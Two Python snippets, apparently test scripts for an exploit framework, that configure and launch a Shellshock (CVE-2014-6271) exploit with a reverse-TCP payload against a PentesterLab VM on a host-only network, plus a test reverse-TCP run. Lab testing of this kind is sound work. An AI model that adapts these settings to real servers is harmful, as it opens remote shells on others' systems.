Esempio n. 1
0
"""
This tests the shellshock exploit on a vulnerable server (VM running on host)

VM is the CVE-2014-6271 .iso from pentesterlabs:
	https://pentesterlab.com/exercises/cve-2014-6271/iso

Running on host-only network through virtualbox
"""
from core.core import Core

victim_ip = "192.168.56.101"
victim_port = "80"
attacker_ip = "192.168.56.102"
attacker_port = "31337"
payload = "reverse_tcp"
cgi_path = "cgi-bin/status"

test_core = Core()
test_core.new_session()
test_core.load_exploit("shellshock")
test_core.active_session.set_exploit_field(["victim_ip", victim_ip])
test_core.active_session.set_exploit_field(["victim_port", victim_port])
test_core.active_session.set_exploit_field(["attacker_ip", attacker_ip])
test_core.active_session.set_exploit_field(["attacker_port", attacker_port])
test_core.active_session.set_exploit_field(["cgi_path", cgi_path])
test_core.active_session.set_exploit_field(["payload", payload])
test_core.run(new_startup_session=False)
#test_core.active_session.run_exploit()
Esempio n. 2
0
from core.core import Core

test_core = Core()
test_core.new_session()
test_core.load_exploit("test_reverse_tcp")
test_core.active_session.run_exploit()
test_core.run(new_startup_session=False)